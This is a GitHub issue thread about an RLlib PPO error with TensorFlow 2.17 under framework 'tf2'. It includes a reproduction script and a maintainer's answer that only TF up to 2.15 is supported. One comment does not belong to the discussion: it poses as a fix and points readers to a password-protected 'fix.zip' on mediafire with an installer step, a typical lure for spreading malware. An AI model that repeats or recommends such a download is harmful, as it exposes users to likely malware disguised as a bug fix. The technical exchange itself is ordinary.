### ISSUE TITLE
RLlib Argument "learning_rate should be float"

### ISSUE THREAD

**Issue by timosturm** [ray-project/ray#47383]
### What happened + What you expected to happen

Cannot use framework `tf2`. It gives me the following error:
> ValueError: Argument `learning_rate` should be float, or an instance of LearningRateSchedule, or a callable (that takes in the current iteration value and returns the corresponding learning rate value). Received instead: learning_rate=<tf.Variable 'default_policy_wk1/lr:0' shape=() dtype=float32, numpy=5e-05>

This is the case when I do not specify the learning rate explicitly, and also when I set it via `.training(lr=5e-5)`. 

### Versions / Dependencies

ray: 2.35.0
tensorflow: 2.17.9

### Reproduction script

```python
from ray.rllib.algorithms import PPOConfig

config = (
    PPOConfig()
    .environment('CartPole-v1')
    .framework("tf2")
)

alog = config.build()
```

### Issue Severity

High: It blocks me from completing my task.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by simonsays1980** [comment]
@timosturm Thanks for raising this issue. I think we are not providing support for TF 2.17, yet, but only up to 2.15. @sven1977 you have a better overview about TF. Which version do we support, yet?

**Comment by simonsays1980** [comment]
@luzgui I will close this issue as downgrading tensorflow is the necessary action to take here. We do not support TF > 2.15.

Feel free to re-open this issue when problems remain.
